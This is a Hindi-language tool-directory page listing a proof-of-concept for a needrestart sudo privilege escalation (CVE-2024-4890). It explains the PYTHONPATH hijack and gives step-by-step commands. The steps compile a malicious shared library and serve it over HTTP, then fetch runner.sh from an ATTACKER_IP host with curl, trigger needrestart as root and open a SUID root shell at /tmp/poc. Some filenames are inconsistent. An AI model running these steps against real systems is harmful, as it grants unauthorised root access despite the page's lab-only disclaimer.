Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/nekr0ff/needrestart-sudo-escalate-cve-2024-4890
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणलर्निंग और शिक्षाबाइनरी शोषणलैब और अभ्यास
GitHubnekr0ff/needrestart-sudo-escalate-cve-2024-4890

needrestart-sudo-escalate-cve-2024-4890

CVE-2024-4890 के लिए PoC एक्सप्लॉइट: neecdrestart (>=3.8) के माध्यम से सुडो विशेषाधिकार वृद्धि. केवल नैतिक प्रयोगशाला के लिए. पायथन और सी में स्क्रिप्ट्स.

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
9 महीने पहलेअभी तक समीक्षित नहीं

CVE-2024-4890: needrestart Sudo विशेषाधिकार वृद्धि PoC

CVE-2024-4890 License: MIT

अस्वीकरण

केवल नियंत्रित वातावरण में प्रयोगशाला उपयोग के लिए। स्पष्ट प्राधिकरण के बिना उत्पादन प्रणालियों पर शोषण न करें। यह PoC केवल शैक्षिक उद्देश्यों के लिए है। लेखक किसी भी दुरुपयोग या अनधिकृत पहुंच के लिए जिम्मेदार नहीं है।

अवलोकन

CVE-2024-4890 needrestart (संस्करण >= 3.8) में एक गंभीर भेद्यता है जो उन्नत विशेषाधिकारों के साथ मनमाना कोड निष्पादन को सक्षम करती है। यह समस्या प्रक्रिया स्कैनिंग के दौरान पर्यावरण चर और कॉन्फ़िगरेशन फ़ाइलों के असुरक्षित हैंडलिंग से उत्पन्न होती है।

विशेष रूप से, जब sudo के साथ चलाया जाता है, तो needrestart चल रही Python प्रक्रियाओं का निरीक्षण करता है, जिसमें उनका PYTHONPATH पर्यावरण चर भी शामिल है। एक हमलावर एक कस्टम PYTHONPATH सेट करके इसे हाईजैक कर सकता है जो एक नियंत्रित निर्देशिका (जैसे, /tmp/attacker) की ओर इशारा करता है। इस निर्देशिका के अंदर, एक दुर्भावनापूर्ण मॉड्यूल (__init__.so) को एक नकली importlib संरचना में रखा जाता है। जब needrestart इसे रूट के रूप में आयात करने का प्रयास करता है (लाइब्रेरीज़ की जांच करने के लिए), तो पेलोड निष्पादित होता है, जो रूट एक्सेस प्रदान करता है।

यह PoC एक चारा Python प्रक्रिया, एक दुर्भावनापूर्ण साझा लाइब्रेरी (C से संकलित), और एक ऑटोमेशन स्क्रिप्ट के माध्यम से शोषण का प्रदर्शन करता है।

पूर्वापेक्षाएँ

  • लक्ष्य: needrestart >= 3.8 और इसके लिए sudo एक्सेस वाला Linux सिस्टम।
  • उपकरण: gcc (संकलन के लिए), curl, python3।

फ़ाइल संरचना

इन्हें लक्ष्य मशीन पर /tmp/attacker में रखें।

  • e.py: चारा Python स्क्रिप्ट (लूप में चलती है, पेलोड सफलता की प्रतीक्षा करती है)।
  • runner.sh: चारा सेट करने और ट्रिगर करने के लिए ऑटोमेशन स्क्रिप्ट।

शोषण चरण

  1. हमलावर मशीन: lib.c को __init__.so में संकलित करें और इसे होस्ट करें:

gcc -shared -fPIC -o init.so lib.c

python3 -m http.server 8000

लक्ष्य मशीन (पीड़ित):

  • /tmp/attacker निर्देशिका बनाएं।
  • main.py कॉपी करें।
  • runner.sh डाउनलोड करें और इसे निष्पादन योग्य बनाएं:
root@kitploit:~
curl http://<ATTACKER_IP>:<PORT>/runner.sh -o /tmp/attacker/runner.sh
chmod +x /tmp/attacker/runner.sh

एक टर्मिनल में सेटअप चलाएं: cd /tmp/attacker && ./runner.sh

यह दुर्भावनापूर्ण मॉड्यूल, चारा स्क्रिप्ट बनाता है और हाईजैक की गई Python प्रक्रिया शुरू करता है।

  1. स्कैन ट्रिगर करें (एक नए SSH सत्र में): sudo /usr/sbin/needrestart

needrestart चारा प्रक्रिया का पता लगाता है, PYTHONPATH पढ़ता है, और रूट के रूप में दुर्भावनापूर्ण __init__.so को आयात करता है—पेलोड निष्पादित करता है।

  1. एक्सेस प्राप्त करें (वापस runner.sh टर्मिनल में):
  • स्क्रिप्ट /tmp/poc (पेलोड द्वारा बनाया गया SUID रूट शेल) का पता लगाती है और एक रूट शेल खोलती है: sudo /tmp/poc -p सफाई: rm -rf /tmp/attacker /tmp/poc (और यदि जोड़ा गया हो तो sudoers प्रविष्टि हटाएं)।

सफलता संकेतक: whoami root दिखाता है या id uid=0(root) दिखाता है।

टूल डाउनलोड करें